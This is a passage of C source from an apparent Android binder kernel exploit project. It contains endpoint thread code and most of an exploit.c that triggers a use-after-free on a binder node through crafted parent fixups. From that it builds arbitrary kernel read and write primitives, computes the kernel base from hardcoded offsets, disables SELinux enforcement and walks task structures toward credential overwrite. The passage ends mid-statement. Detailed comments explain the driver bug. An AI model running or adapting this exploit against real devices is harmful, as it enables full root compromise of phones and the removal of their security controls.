*handle = endpoints; 109 | 110 | while (handle) { 111 | if (handle->pid == pid) 112 | return handle; 113 | handle = handle->next; 114 | } 115 | 116 | return NULL; 117 | } 118 | 119 | 120 | void plop(void) 121 | { 122 | struct endpoint_handle *handle = NULL; 123 | 124 | /* Setup jmpbufs. */ 125 | handle = _lookup_by_pid(syscall(__NR_gettid)); 126 | 127 | /* Close binder to release the UAFed pending node. 128 | * This is the only way to actually free them without entered 129 | * the binder_transaction_buffer_release() function. 130 | */ 131 | binder_close(handle->bs); 132 | handle->status = 0; 133 | 134 | /* longjmp. */ 135 | longjmp(handle->env, 0); 136 | 137 | } 138 | 139 | 140 | /* 141 | * The binder endpoint thread. 142 | */ 143 | static void *endpoint_thread(void *args) 144 | { 145 | uint8_t data[128]; 146 | uint32_t remaining = 0; 147 | uint32_t consumed = 0; 148 | struct endpoint_handle *handle = (struct endpoint_handle *)args; 149 | 150 | 151 | setjmp(handle->env); 152 | 153 | signal(SIGTERM, plop); 154 | 155 | handle->bs = binder_open(BINDER_DEVICE, 128 * 1024); 156 | if (!handle->bs) { 157 | log_err("[-] Failed to open binder device.\n"); 158 | goto error; 159 | } 160 | 161 | /* Publish our endpoint name using the fake system server of our APK. */ 162 | if (!publish_handle(handle->bs, 0x42, handle->name)) { 163 | log_err("[-] Failed to publish handle\n"); 164 | goto error; 165 | } 166 | 167 | /* Enter looper. */ 168 | uint32_t looper = BC_ENTER_LOOPER; 169 | binder_write(handle->bs, &looper, sizeof(looper)); 170 | 171 | /* Everything's fine. */ 172 | handle->status = 1; 173 | pthread_barrier_wait(&handle->barrier); 174 | 175 | /* We do this "manually" and don't rely to much on the binder api because 176 | * we do some weird things. 177 | */ 178 | uint32_t cmd; 179 | struct binder_transaction_data *tr; 180 | 181 | 182 | while ((cmd = binder_read_next(handle->bs, data, &remaining, &consumed))) { 183 | switch (cmd) { 184 | case BR_DECREFS: 185 | break; 186 | case BR_TRANSACTION: { 187 | uint8_t rdata[256]; 188 | struct binder_io msg; 189 | struct binder_io reply; 190 | int res; 191 | 192 | tr = (struct binder_transaction_data *)(data + consumed - sizeof(*tr)); 193 | bio_init(&reply, rdata, sizeof(rdata), 4); 194 | bio_init_from_txn(&msg, tr); 195 | res = endpoint_transaction_handler(handle, tr, &msg, &reply); 196 | if (tr->flags & TF_ONE_WAY) { 197 | if (res == 42) 198 | continue; 199 | binder_free_buffer(handle->bs, tr->data.ptr.buffer); 200 | } else { 201 | if (res == 42) 202 | /* we reply, but skip freing the buffer. */ 203 | binder_send_reply(handle->bs, &reply, NULL, 0); 204 | else 205 | binder_send_reply(handle->bs, &reply, tr->data.ptr.buffer, 0); 206 | } 207 | break; 208 | } 209 | default: 210 | break; 211 | } 212 | } 213 | 214 | 215 | exit(0); 216 | error: 217 | handle->status = -1; 218 | pthread_barrier_wait(&handle->barrier); 219 | exit(0); 220 | } 221 | 222 | 223 | 224 | void endpoint_reset(const char *endpoint_name) 225 | { 226 | struct endpoint_handle *handle = NULL; 227 | 228 | /* Double check that the name doesn't already exists. */ 229 | if ((handle = _lookup_by_name(endpoint_name)) == NULL) { 230 | log_err("[-] An endpoint already exists with that name\n"); 231 | return; 232 | } 233 | 234 | /* Reset the endpoint. */ 235 | kill(handle->pid, SIGTERM); 236 | 237 | /* Wait on barrier. */ 238 | pthread_barrier_wait(&handle->barrier); 239 | } 240 | 241 | static void endpoint_handle_free(struct endpoint_handle *handle) 242 | { 243 | struct endpoint_handle *tmp = endpoints; 244 | 245 | 246 | /* Start by removing from linked list. */ 247 | if (handle == endpoints) { 248 | endpoints = handle->next; 249 | } else { 250 | while (tmp->next != handle) 251 | tmp = tmp->next; 252 | /* Remove */ 253 | tmp->next = handle->next; 254 | } 255 | 256 | free(handle->name); 257 | free(handle->stack); 258 | binder_close(handle->bs); 259 | free(handle); 260 | } 261 | 262 | /* 263 | * Bootstrap the binder endpoint. 264 | */ 265 | bool bootstrap_endpoint(const char *endpoint_name) 266 | { 267 | struct endpoint_handle *handle = NULL; 268 | 269 | 270 | /* Double check that the name doesn't already exists. */ 271 | if (_lookup_by_name(endpoint_name) != NULL) { 272 | log_err("[-] An endpoint already exists with that name\n"); 273 | return false; 274 | } 275 | 276 | /* Allocate handle. */ 277 | handle = malloc(sizeof(*handle)); 278 | if (handle == -1) { 279 | log_err("[-] Unable to allocate endpoint handle. Reason: '%s'\n", strerror(errno)); 280 | return false; 281 | } 282 | 283 | memset(handle, 0, sizeof(*handle)); 284 | 285 | if (pthread_barrier_init(&handle->barrier, NULL, 2)) { 286 | perror("pthread_barrier_init"); 287 | return false; 288 | } 289 | 290 | handle->next = NULL; 291 | handle->stack = malloc(65536); 292 | handle->name = strdup(endpoint_name); 293 | handle->status = 0; 294 | handle->pid = clone(endpoint_thread, handle->stack + 65536, CLONE_VM|SIGCHLD, handle); 295 | 296 | 297 | /* Wait on the barrier for the endpoint creation to be complete. */ 298 | pthread_barrier_wait(&handle->barrier); 299 | 300 | if (handle->status < 0) { 301 | int status; 302 | waitpid(handle->pid, &status, NULL); 303 | endpoint_handle_free(handle); 304 | return false; 305 | } 306 | 307 | /* Insert the endpoint in the linked list. */ 308 | if (!endpoints) 309 | endpoints = handle; 310 | else { 311 | struct endpoint_handle *tmp = endpoints; 312 | while (tmp->next != NULL) 313 | tmp = tmp->next; 314 | /* Insert. */ 315 | tmp->next = handle; 316 | } 317 | 318 | return true; 319 | } 320 | 321 | bool terminate_endpoint(const char *endpoint_name) 322 | { 323 | struct endpoint_handle *handle = _lookup_by_name(endpoint_name); 324 | int status; 325 | 326 | if (!handle) { 327 | log_err("[-] No endpoint named: '%s'\n", endpoint_name); 328 | exit(1); 329 | return false; 330 | } 331 | kill(handle->pid, SIGKILL); 332 | waitpid(handle->pid, &status, 0); 333 | 334 | endpoint_handle_free(handle); 335 | 336 | return true; 337 | } 338 | 339 | struct endpoint_handle *get_endpoints() 340 | { 341 | return endpoints; 342 | } 343 | 344 | -------------------------------------------------------------------------------- /lpe/src/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | #include "node.h" 17 | #include "exploit.h" 18 | #include "handle.h" 19 | #include "binder.h" 20 | #include "log.h" 21 | #include "endpoint.h" 22 | #include "pending_node.h" 23 | 24 | #define BINDER_BUFFER_SZ 128 * 1024 25 | #define RESERVED_BUFFER_SZ 127 * 1024 26 | 27 | #define KERNEL_MAGIC (unsigned long)0x644d5241 28 | 29 | #define SELINUX_ENFORCING_OFFSET 0x2ba4000 30 | #define MEMSTART_ADDR_OFFSET 0x20d1090 31 | #define SYSCTL_TABLE_ROOT_OFFSET 0x29da3f8 32 | #define PROC_DOUINTVEC_OFFSET 0x196775c 33 | #define INIT_TASK_OFFSET 0x29a1e80L 34 | #define INIT_CRED_OFFSET 0x29b00a0 35 | #define OFFSET_PIPE_FOP 0x1f2f650 36 | 37 | #define TASKS_OFFSET 0x570 38 | #define PID_OFFSET 0x670 39 | #define MM_OFFSET 0x5c0 40 | #define REAL_CRED_OFFSET 0x838 41 | 42 | char pathname[64]; 43 | 44 | 45 | uint64_t reserved_buffer_sz = 0; 46 | uint64_t memstart_addr = 0; 47 | uint64_t kernel_base = 0; 48 | 49 | /* 50 | * Convert physical address to kernel virtual address. 51 | */ 52 | 53 | uint64_t phys_to_virt(uint64_t phys) 54 | { 55 | return (phys - memstart_addr) | 0xFFFFFFC000000000; 56 | } 57 | 58 | /* 59 | * Trigger the bug, and free pending node, on which we still have 60 | * a reference. This will be the primitive for all the exploitation. 61 | */ 62 | void dec_node(struct binder_state *bs, uint64_t target, uint64_t vma_start, bool strong, bool second) 63 | { 64 | 65 | struct binder_transaction_data_sg sg; 66 | struct binder_transaction_data *td; 67 | struct binder_write_read bwr; 68 | 69 | uint64_t handle = 0; /* It *SHOULD* be 0 as it's the value from ref created from the ctx mgr node. */ 70 | 71 | /* Send a big buffer. */ 72 | 73 | uint32_t tr_size = reserved_buffer_sz; // Use a query size of 0x20000 (we subtract 0x10 for the secctx) 74 | uint8_t data[BINDER_BUFFER_SZ]; 75 | uint64_t offsets[128]; 76 | uint8_t sg_buf[0x1000]; 77 | uint32_t readbuf[32]; 78 | uint8_t *ptr = data; 79 | uint64_t *offs = offsets; 80 | uint8_t buf[0x100]; 81 | uint32_t buflen = 0; 82 | 83 | 84 | /* 85 | * Used to perform BC_TRANSACTION_SG queries. 86 | */ 87 | struct { 88 | uint32_t cmd; 89 | struct binder_transaction_data txn; 90 | binder_size_t buffers_size; 91 | } __attribute__((packed)) writebuf; 92 | 93 | *(uint64_t *)(data + 0xe8) = 0x40; // offset of valid BINDER_TYPE_PTR 94 | /* The purpose of this apparently useless transaction is to initialize the content of the qword at 95 | * offset 0xf0 from the beginning of the transaction buffer of the servicemanager. 96 | * I used a transaction size of 0x20000 to be sure to retrieve the whole buffer for myself, and this way 97 | * be sure to be serviced the very beginning of the transaction buffer. 98 | */ 99 | // the transaction won't make it through as it will fail trying to copy from a NULL userland pointer 100 | binder_transaction(bs, false, target, data, tr_size, NULL, 1); 101 | 102 | 103 | /* Wait for the BR_FAILED_REPLY. */ 104 | uint32_t remaining = 0, consumed = 0; 105 | while (binder_read_next(bs, data, &remaining, &consumed) != BR_FAILED_REPLY); 106 | 107 | memset(buf, 0, 0x100); 108 | memset(offsets, 0, 128 * sizeof(uint64_t)); 109 | 110 | /* From here it gets a little bit messy / crafty. */ 111 | 112 | /* 113 | * Create the first object valid object, which will be smashed after the bug has been successfully triggered. 114 | */ 115 | struct flat_binder_object *fbo = (struct flat_binder_object *)ptr; 116 | fbo->hdr.type = strong ? BINDER_TYPE_HANDLE : BINDER_TYPE_WEAK_HANDLE; 117 | fbo->flags = 0; 118 | fbo->handle = target; 119 | fbo->cookie = 0; 120 | *(offs++) = ((uint8_t *)fbo) - data; 121 | ptr = ++fbo; 122 | 123 | 124 | /* 125 | * Here, we craft a BINDER_TYPE_PTR, which won't be added to the offset array, and will thus not be validated by the binder 126 | * driver. It will be used later, once the bug is triggered, and we can make the `parent` pointer, point to this object. 127 | * As it wasn't validated we can't assign it an arbitrary length. The sole purpose of this object is to use the 128 | * binder parent fixup code to overwrite a qword at an "arbitrary" offset with the userland address of a child buffer. 129 | * This is the primitive which is used to overwrite the handle value of the BINDER_TYPE_HANDLE we created above. 130 | */ 131 | struct binder_buffer_object *bbo = (struct binder_buffer_object *)(ptr); //For now, we assume the fd will be 4 132 | bbo->hdr.type = BINDER_TYPE_PTR; 133 | bbo->flags = 0; 134 | bbo->buffer = vma_start; /* This *MUST* be the address of the beginning of the userland mapping of /dev/binder. */ 135 | bbo->length = 0xdeadbeefbadc0ded; 136 | bbo->parent = 0; 137 | bbo->parent_offset = 0; 138 | ptr = ++bbo; 139 | 140 | /* This one is the official one. */ 141 | bbo->hdr.type = BINDER_TYPE_PTR; 142 | bbo->flags = 0; 143 | bbo->buffer = sg_buf; 144 | bbo->length = 0x10; 145 | bbo->parent = 0; 146 | bbo->parent_offset = 0; 147 | 148 | // Add it to the offsets array 149 | *(offs++) = ((uint8_t *)bbo) - data; 150 | ptr = ++bbo; 151 | 152 | /* We create an additionnal BINDER_TYPE_PTR, whose parent will be the one we created just above. This is where the bug is triggered, 153 | * as the bbo->parent index is set to 6 which is wrong as it is > to the number of offsets in the offsets array. offs[6] will thus end up pointing in 154 | * not yet initalized data reserved for the sg_buf. The whole purpose of the seemingly useless first transaction was to initialize this address with the 155 | * value 0x40, which is the offset of the previous BINDER_TYPE_PTR object in order for the `binder_validate_ptr` and `binder_valid_fixup` function to succeed. 156 | * This BINDER_TYPE_PTR is then eventually validated and the `last_fixup_obj_off` is set to the offset of this object. 157 | * This implies that we just validated a BINDER_TYPE_PTR whose bbo->parent index points into an array entry which will be modified by the next BINDER_TYPE_PTR below, 158 | * that the driver will process. 159 | */ 160 | bbo->hdr.type = BINDER_TYPE_PTR; 161 | bbo->flags = BINDER_BUFFER_FLAG_HAS_PARENT; 162 | bbo->buffer = NULL; 163 | bbo->length = 0; 164 | bbo->parent = 6; 165 | bbo->parent_offset = 0; 166 | buflen += bbo->length; 167 | 168 | // Add it to the offsets array 169 | *(offs++) = ((uint8_t *)bbo) - data; 170 | ptr = ++bbo; 171 | 172 | /* 173 | * And finally, the last nail in the coffin. 174 | * We craft the almost exact same BINDER_TYPE_PTR as above, still having a parent index of 6. This time however, we specific a 'buffer', whose data will be copied from 175 | * before validating the BINDER_TYPE_PTR. This qword will overwrite the value at offs[6], replacing the value 0x40 pointing to a validated BINDER_TYPE_PTR, with the value 0x18, 176 | * which points to the very first BINDER_TYPE_PTR, which wasn't validated by the binder driver as we haven't added it's offset to the offsets array. The following will now happen 177 | * in `binder_fixup_parent()`: 178 | * ```c 179 | 2884 parent = binder_validate_ptr(target_proc, b, &object, bp->parent, 180 | 2885 off_start_offset, &parent_offset, 181 | 2886 num_valid); 182 | ... 183 | 2893 if (!binder_validate_fixup(target_proc, b, off_start_offset, 184 | 2894 parent_offset, bp->parent_offset, 185 | 2895 last_fixup_obj_off, 186 | 2896 last_fixup_min_off)) { 187 | 2897 binder_user_error("%d:%d got transaction with out-of-order buffer fixup\n", 188 | 2898 proc->pid, thread->pid); 189 | 2899 return -EINVAL; 190 | 2900 } 191 | * ``` 192 | * Here, parent will now point to the unvalidated BINDER_TYPE_PTR, however, to be used by the driver it needs to be validated by the `binder_validate_fixup()` function: 193 | * ```c 194 | * 2414 static bool binder_validate_fixup(struct binder_proc *proc, 195 | 2415 struct binder_buffer *b, 196 | 2416 binder_size_t objects_start_offset, 197 | 2417 binder_size_t buffer_obj_offset, 198 | 2418 binder_size_t fixup_offset, 199 | 2419 binder_size_t last_obj_offset, 200 | 2420 binder_size_t last_min_offset) 201 | 2421 { 202 | ... 203 | 2427 while (last_obj_offset != buffer_obj_offset) { 204 | 2428 unsigned long buffer_offset; 205 | 2429 struct binder_object last_object; 206 | 2430 struct binder_buffer_object *last_bbo; 207 | 2431 size_t object_size = binder_get_object(proc, b, last_obj_offset, 208 | 2432 &last_object); 209 | 2433 if (object_size != sizeof(*last_bbo)) 210 | 2434 return false; 211 | 2435 212 | 2436 last_bbo = &last_object.bbo; 213 | 2437 * 214 | 2438 * Safe to retrieve the parent of last_obj, since it 215 | 2439 * was already previously verified by the driver. 216 | 2440 * 217 | 2441 if ((last_bbo->flags & BINDER_BUFFER_FLAG_HAS_PARENT) == 0) 218 | 2442 return false; 219 | 2443 last_min_offset = last_bbo->parent_offset + sizeof(uintptr_t); 220 | 2444 buffer_offset = objects_start_offset + 221 | 2445 sizeof(binder_size_t) * last_bbo->parent, 222 | 2446 binder_alloc_copy_from_buffer(&proc->alloc, &last_obj_offset, 223 | 2447 b, buffer_offset, 224 | 2448 sizeof(last_obj_offset)); 225 | 2449 } 226 | 2450 return (fixup_offset >= last_min_offset); 227 | 2451 } 228 | ``` 229 | Here, as the `last_bbo` pointer was previously validated by the driver, it is trusted, and it particular, its `parent` field is trusted. However, the value of 230 | last_bbo->parent is now `0x18` instead of `0x40`, which ends up setting `last_obj_offset` to the same value as `buffer_obj_offset` (which is the offset of the 231 | fake BINDER_TYPE_PTR), and exists the loop. From now on, the driver will be manipulating and unvalidated object. The following code will try to fixup the buffer address 232 | in the fake BINDER_TYPE_PTR object: 233 | ```c 234 | 2909 buffer_offset = bp->parent_offset + 235 | 2910 (uintptr_t)parent->buffer - (uintptr_t)b->user_data; 236 | 2911 binder_alloc_copy_to_buffer(&target_proc->alloc, b, buffer_offset, 237 | 2912 &bp->buffer, sizeof(bp->buffer)); 238 | ``` 239 | As the parent->buffer is equal to b->user_data, only the parent_offset which is 8, is taken into account. This means that the userland address of the 240 | bp->buffer will be copied at the offset 8 from the beginning of the binder buffer, which happens to be the offset of the node value of the BINDER_TYPE_HANDLE 241 | (which has meanwhile been transformed into a BINDER_TYPE_BINDER by the binder driver) object we added at the beginning of the transaction. When eventually entering 242 | the binder_transaction_buffer_release() function, the driver will fail trying to decrement the invalid node. 243 | */ 244 | uint64_t new_off = 0x18; 245 | bbo->hdr.type = BINDER_TYPE_PTR; 246 | bbo->flags = BINDER_BUFFER_FLAG_HAS_PARENT; 247 | bbo->buffer = &new_off; 248 | bbo->length = sizeof(new_off); 249 | bbo->parent = 0x6; // offs[6] = 0x18; 250 | bbo->parent_offset = 0x8 + ((second == true) ? 4 : 0); 251 | *(offs++) = ((uint8_t *)bbo) - data; 252 | ptr = ++bbo; 253 | 254 | /* Send the BC_TRANSACTION_SG transaction. */ 255 | writebuf.cmd = BC_TRANSACTION_SG; 256 | //writebuf.txn.target.handle = 0; // Ctxt mgr 257 | writebuf.txn.target.handle = target; // endpoint 258 | writebuf.txn.code = TRIGGER_DECREF; 259 | writebuf.txn.flags = 0; 260 | writebuf.txn.data_size = ((uint8_t*)ptr) - ((uint8_t *)data); 261 | writebuf.txn.offsets_size = ((uint8_t*)offs) - ((uint8_t *)offsets); 262 | writebuf.txn.data.ptr.buffer = data; 263 | writebuf.txn.data.ptr.offsets = offsets; 264 | buflen = tr_size - writebuf.txn.data_size - writebuf.txn.offsets_size; 265 | writebuf.buffers_size = buflen; 266 | 267 | bwr.write_size = sizeof(writebuf); 268 | bwr.write_consumed = 0; 269 | bwr.write_buffer = &writebuf; 270 | bwr.read_size = 0; 271 | bwr.read_consumed = 0; 272 | bwr.read_buffer = 0; 273 | 274 | /* Send bogus query. */ 275 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 276 | 277 | /* Wait for the reply and free. */ 278 | remaining = 0, consumed = 0; 279 | while (binder_read_next(bs, data, &remaining, &consumed) != BR_REPLY); 280 | 281 | /* Free the transaction buffer. */ 282 | td = (struct binder_transaction_data *)(data + consumed - sizeof(*td)); 283 | /* Free buffer. */ 284 | binder_free_buffer(bs, td->data.ptr.buffer); 285 | } 286 | 287 | 288 | /* 289 | * Do all the preparation for the exploitation, that is setup up a number of pending nodes 290 | * on the soon to be dangling `binder_node`. I used multiple pending nodes as I need to leak values 291 | * multiple times in order to disclose the kernel address of the dangling `binder_node`, and know 292 | * where I add controlled kernel data in order to bypass PAN. 293 | */ 294 | uint64_t setup_pending_nodes(struct binder_state *bs, uint64_t endpoint_handle, pthread_t *th, uint32_t n1, uint32_t n2) 295 | { 296 | struct binder_transaction_data *tr; 297 | uint8_t txn_data[BINDER_BUFFER_SZ]; 298 | uint8_t rdata[512]; 299 | uint64_t uaf_node = 0, uaf_node2 = 0; 300 | uint32_t remaining = 0, consumed = 0; 301 | struct binder_transaction_data *t = (struct binder_transaction_data *)(rdata + sizeof(uint32_t)); 302 | 303 | struct binder_io msg, reply; 304 | 305 | /* Free the reserved buffer. As we are supposed to only perform 306 | * transaction up to this size, which won't require creating pending nodes 307 | * it should be alright. 308 | */ 309 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 310 | bio_init(&reply, rdata, sizeof(rdata), 10); 311 | 312 | /* Free the reserved buffer. */ 313 | if (binder_call(bs, &msg, &reply, endpoint_handle, FREE_RESERVED_BUFFER) < 0) { 314 | log_err("[-] Binder call GET_VMA_START failed.\n"); 315 | exit(1); 316 | } 317 | binder_free_buffer(bs, reply.data0); 318 | 319 | 320 | /* Compute the reserved buffer size, and ask the endpoint to reserve it. */ 321 | reserved_buffer_sz = RESERVED_BUFFER_SZ - (n1 + n2) * 0x10; 322 | make_transaction(rdata, false, endpoint_handle, txn_data, reserved_buffer_sz, NULL, 0); 323 | t->code = RESERVE_BUFFER; 324 | /* Make the call. */ 325 | binder_write(bs, rdata, sizeof(*t) + sizeof(uint32_t)); 326 | 327 | /* Wait for the BR_TRANSACTION_COMPLETE. */ 328 | while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY); 329 | /* Free the transaction. */ 330 | tr = ((uint8_t*)rdata + consumed - sizeof(*tr)); 331 | binder_free_buffer(bs, tr->data.ptr.buffer); 332 | 333 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 334 | bio_init(&reply, rdata, sizeof(rdata), 10); 335 | 336 | /* Retrieve the vma_start address of the endpoint. */ 337 | if (binder_call(bs, &msg, &reply, endpoint_handle, GET_VMA_START) < 0) { 338 | log_err("[-] Binder call GET_VMA_START failed.\n"); 339 | exit(1); 340 | } 341 | 342 | uint64_t vma_start = bio_get_uint32(&reply) + (((uint64_t)bio_get_uint32(&reply)) << 32); 343 | binder_free_buffer(bs, reply.data0); 344 | 345 | /* Now, we exchange handle, so as to create the vulnerable node, and for the endpoint 346 | * to be able to reach back to us. 347 | */ 348 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 349 | bio_init(&reply, rdata, sizeof(rdata), 10); 350 | 351 | bio_put_obj(&msg, 0x4141); //Add arbitrary node value 352 | if (binder_call(bs, &msg, &reply, endpoint_handle, EXCHANGE_HANDLES) < 0) { 353 | log_err("[-] Binder call GET_VMA_START failed.\n"); 354 | exit(1); 355 | } 356 | 357 | /* The endpoint should have created a ref to the uaf node. */ 358 | uaf_node = bio_get_ref(&reply); 359 | if (!uaf_node) { 360 | log_err("[-] Failed to grab a reference to the UAF node.\n"); 361 | exit(1); 362 | } 363 | 364 | /* Take a reference to the node. */ 365 | binder_acquire(bs, uaf_node); 366 | 367 | uaf_node2 = bio_get_ref(&reply); 368 | if (!uaf_node2) { 369 | log_err("[-] Failed to grab a reference to the UAF node.\n"); 370 | exit(1); 371 | } 372 | 373 | /* Take a reference to the node. */ 374 | binder_acquire(bs, uaf_node2); 375 | 376 | 377 | /* Free the buffer. */ 378 | binder_free_buffer(bs, reply.data0); 379 | 380 | int i; 381 | pthread_t node_th; 382 | 383 | for (i = 0; i < n1; i++) { 384 | /* Create the first pending node. */ 385 | node_th = pending_node_create(bs, uaf_node); 386 | 387 | if (th) 388 | th[i] = node_th; 389 | } 390 | 391 | int j; 392 | for (j = 0; j < n2; j++) { 393 | node_th = pending_node_create(bs, uaf_node2); 394 | if (th) 395 | th[i + j] = node_th; 396 | } 397 | 398 | /* Now that we have a pending node, we can release our reference to it. */ 399 | binder_release(bs, uaf_node); 400 | binder_release(bs, uaf_node2); 401 | 402 | /* Free the reserved buffer. As we are supposed to only perform 403 | * transaction up to this size, which won't require creating pending nodes 404 | * it should be alright. 405 | */ 406 | bio_init(&msg, txn_data, sizeof(txn_data), 10); 407 | bio_init(&reply, rdata, sizeof(rdata), 10); 408 | 409 | /* Free the reserved buffer. */ 410 | if (binder_call(bs, &msg, &reply, endpoint_handle, FREE_RESERVED_BUFFER) < 0) { 411 | log_err("[-] Binder call GET_VMA_START failed.\n"); 412 | exit(1); 413 | } 414 | binder_free_buffer(bs, reply.data0); 415 | 416 | /* return the vulnerable node reference to the caller. */ 417 | return vma_start; 418 | } 419 | 420 | /* 421 | * Read SELinux enforcing through selinuxfs. 422 | */ 423 | char read_selinux_enforcing() { 424 | int fd = open("/sys/fs/selinux/enforce", O_RDONLY); 425 | char enforcing; 426 | read(fd, &enforcing, 1); 427 | close(fd); 428 | return enforcing; 429 | } 430 | 431 | struct exp_node * file; 432 | int pipes[2]; 433 | 434 | /* 435 | * 32-bit kernel read primitive using corrupted f_inode, such that 436 | * epitem.event.data overlaps with f_inode->i_sb. 437 | */ 438 | 439 | uint64_t read32(uint64_t addr) { 440 | struct epoll_event evt; 441 | evt.events = 0; 442 | evt.data.u64 = addr - 24; 443 | int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt); 444 | uint32_t test = 0xdeadbeef; 445 | ioctl(pipes[0], FIGETBSZ, &test); 446 | return test; 447 | } 448 | 449 | /* 450 | * 64-bit kernel read primitive using read32 451 | */ 452 | 453 | uint64_t read64(uint64_t addr) { 454 | uint32_t lo = read32(addr); 455 | uint32_t hi = read32(addr+4); 456 | 457 | return (((uint64_t)hi) << 32) | lo; 458 | } 459 | 460 | void *ctl_table_uaddr; 461 | 462 | /* 463 | * 64-bit kernel write primitive using fake proc sysctl entry. 464 | */ 465 | void write64(uint64_t addr, uint64_t value) { 466 | *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write 467 | *(uint32_t *)(ctl_table_uaddr + 16) = 0x8; 468 | 469 | char buf[100]; 470 | int fd = open(pathname, O_WRONLY); 471 | if (fd < 0) { 472 | printf("[!] Failed to open. Errno: %d\n", errno); 473 | } 474 | 475 | sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32)); 476 | int ret = write(fd, buf, strlen(buf)); 477 | if (ret < 0) 478 | printf("[!] Failed to write, errno: %d\n", errno); 479 | close(fd); 480 | } 481 | 482 | /* 483 | * 32-bit kernel write primitive using fake proc sysctl entry. 484 | */ 485 | void write32(uint64_t addr, uint32_t value) { 486 | *(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write 487 | *(uint32_t *)(ctl_table_uaddr + 16) = 4; 488 | 489 | char buf[100]; 490 | int fd = open(pathname, O_WRONLY); 491 | sprintf(buf, "%u\n", value); 492 | write(fd, buf, strlen(buf)); 493 | close(fd); 494 | } 495 | 496 | /* 497 | * Find task given its PID, starting at task start. 498 | */ 499 | uint64_t get_task_by_pid(uint64_t start, int pid) { 500 | uint64_t task = read64(start + TASKS_OFFSET + 8) - TASKS_OFFSET; 501 | 502 | while (task != start) { 503 | if (read32(task + PID_OFFSET) == pid) { 504 | return task; 505 | } 506 | 507 | /* Go to prev */ 508 | task = read64(task + TASKS_OFFSET + 8) - TASKS_OFFSET; 509 | } 510 | 511 | return 0; 512 | } 513 | 514 | 515 | /* 516 | * pwn! 517 | */ 518 | int main() 519 | { 520 | int res = -1; 521 | uint64_t A, B; 522 | 523 | 524 | void *map = mmap(2<<20, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_POPULATE, -1, 0); 525 | log_info("[+] Mapped %lx\n", map); 526 | 527 | /* We'll use one of these pipes for leaking its address and corrupting f_inode. */ 528 | pipe(&pipes[0]); 529 | 530 | pin_cpu(0); 531 | 532 | log_info("[+] selinux_enforcing before exploit: %c\n", read_selinux_enforcing()); 533 | 534 | struct binder_state *bs = binder_open(BINDER_DEVICE, 128 * 1024); 535 | if (!bs) { 536 | log_err("[-] Failed to open /dev/binder.\n"); 537 | exit(1); 538 | } 539 | 540 | /* Spawn the threads used for reallocating the dangling `binder_node` with controlled data. */ 541 | spawn_realloc_threads(); 542 | 543 | /* Step 1: leak a pipe file address */ 544 | 545 | file = node_new("leak_file"); 546 | 547 | /* Only works on file implementing the 'epoll' function. */ 548 | while (!node_realloc_epitem(file, pipes[0])) 549 | node_reset(file); 550 | 551 | uint64_t file_addr = file->file_addr; 552 | log_info("[+] pipe file: 0x%lx\n", file_addr); 553 | 554 | 555 | /* Step 2: leak epitem address */ 556 | struct exp_node *epitem_node = node_new("epitem"); 557 | while (!node_kaddr_disclose(file, epitem_node)) 558 | node_reset(epitem_node); 559 | 560 | printf("[*] file epitem at %lx\n", file->kaddr); 561 | 562 | /* 563 | * Alright, now we want to do a write8 to set file->f_inode. 564 | * Given the unlink primitive, we'll set file->f_inode = epitem + 80 565 | * and epitem + 88 = &file->f_inode. 566 | * 567 | * With this we can change f_inode->i_sb by modifying the epitem data, 568 | * and get an arbitrary read through ioctl. 569 | * 570 | * This is corrupting the fllink, so we better don't touch anything there! 571 | */ 572 | 573 | struct exp_node *write8_inode = node_new("write8_inode"); 574 | node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20); 575 | 576 | printf("[*] Write done, should have arbitrary read now.\n"); 577 | uint64_t fop = read64(file_addr + 0x28); 578 | printf("[+] file operations: %lx\n", fop); 579 | 580 | kernel_base = fop - OFFSET_PIPE_FOP; 581 | printf("[+] kernel base: %lx\n", kernel_base); 582 | 583 | /* Just a basic check */ 584 | if (read64(kernel_base + 0x38) != KERNEL_MAGIC) { 585 | printf("[*] Something went wrong with arbitrary read setup!?\n"); 586 | goto out; 587 | } 588 | 589 | /* Step 3: Disable selinux by writing NULL to selinux_enforcing */ 590 | struct exp_node *write8_selinux = node_new("write8_selinux"); 591 | node_write_null(write8_selinux, kernel_base + SELINUX_ENFORCING_OFFSET); 592 | 593 | /* 594 | * Step 4: Setup a fake sysctl node in our own userland page. We will start 595 | * by locating the kernel address of this page by parsing our own pgd. 596 | */ 597 | 598 | uint64_t init_task = kernel_base + INIT_TASK_OFFSET; 599 | uint64_t init_cred = read64(init_task + REAL_CRED_OFFSET); 600 | printf("[*] init_cred: %lx\n", init_cred); 601 | 602 | 603 | uint64_t current = get_task_by_pid(init_task, getpid()); 604 | if (current == 0) { 605 | printf("[*] Failed to find ourselves...\n"); 606 | goto out; 607 | } 608 | 609 | /* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */ 610 | 611 | memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET); 612 | printf("[+] memstart_addr: 0x%lx\n", memstart_addr); 613 | uint64_t mm = read64(current + MM_OFFSET); 614 | uint64_t pgd = read64(mm + 0x40); 615 | uint64_t entry = read64(pgd); 616 | 617 | uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 618 | printf("[+] First level entry: %lx -> next table at %lx\n", entry, next_tbl); 619 | 620 | /* Offset 8 for 2MB boundary */ 621 | entry = read64(next_tbl + 8); 622 | next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 623 | printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl); 624 | 625 | entry = read64(next_tbl); 626 | uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12); 627 | 628 | 629 | *(uint64_t *)map = 0xdeadbeefbadc0ded; 630 | if ( 